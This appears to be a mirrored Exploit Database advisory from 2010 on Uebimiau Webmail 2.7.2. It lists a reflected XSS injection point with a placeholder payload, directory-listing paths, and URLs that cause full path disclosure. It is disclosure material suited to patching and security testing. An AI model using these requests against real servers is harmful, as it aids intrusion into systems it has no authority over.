Uebimiau Webmail 2.7.2 – Multiple Vulnerabilities

• Exploit Database
• 15 阅读

• 作者： cp77fk4r
  日期： 2010-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11906/

• # Exploit Title: Uebimiau Webmail <= 2.7.2 Multiple Vulnerabilities.
  # Date: 13/03/10
  # Author: cp77fk4r | empty0page[SHIFT+2]gmail.com<http://gmail.com> | www.DigitalWhisper.co.il<http://www.DigitalWhisper.co.il>
  # Software Link: http://www.uebimiau.org/
  # Version: <= 2.7.2
  # Tested on: PHP
  #
  ##[Cross Site Scripting]
  Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. (OWASP)
  #
  http://[SERVER]/webmail/index.php?lid=en_US&tid=clean&f_user=&six=3&f_email=[YOUR_XSS_HERE]
  #
  #
  ##[Directory Listing:]
  #
  http://[SERVER]/webmail/inc
  http://[SERVER]/webmail/images/
  http://[SERVER]/webmail/extra/
  http://[SERVER]/webmail/themes/
  http://[SERVER]/webmail/smarty
  #
  ##[Full Path Disclosure:]
  Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. (OWASP)
  #
  The following pages require files without checking if they exist. loading them will return a Fatal Errors and Warnings ("No such file or directory") with includes their Full-Path:
  #
  http://[SERVER]/webmail/inc/class.uebimiau.php
  http://[SERVER]/webmail/inc/class.uebimiau_mail.php
  http://[SERVER]/webmail/inc/config.php
  http://[SERVER]/webmail/inc/inc.php
  http://[SERVER]/webmail/smarty/Smarty_Compiler.class.php
  http://[SERVER]/webmail/smarty/plugins/function.html_select_date.php
  http://[SERVER]/webmail/smarty/plugins/function.html_select_time.php
  http://[SERVER]/webmail/smarty/plugins/modifier.date_format.php
  #
  #
  [e0f]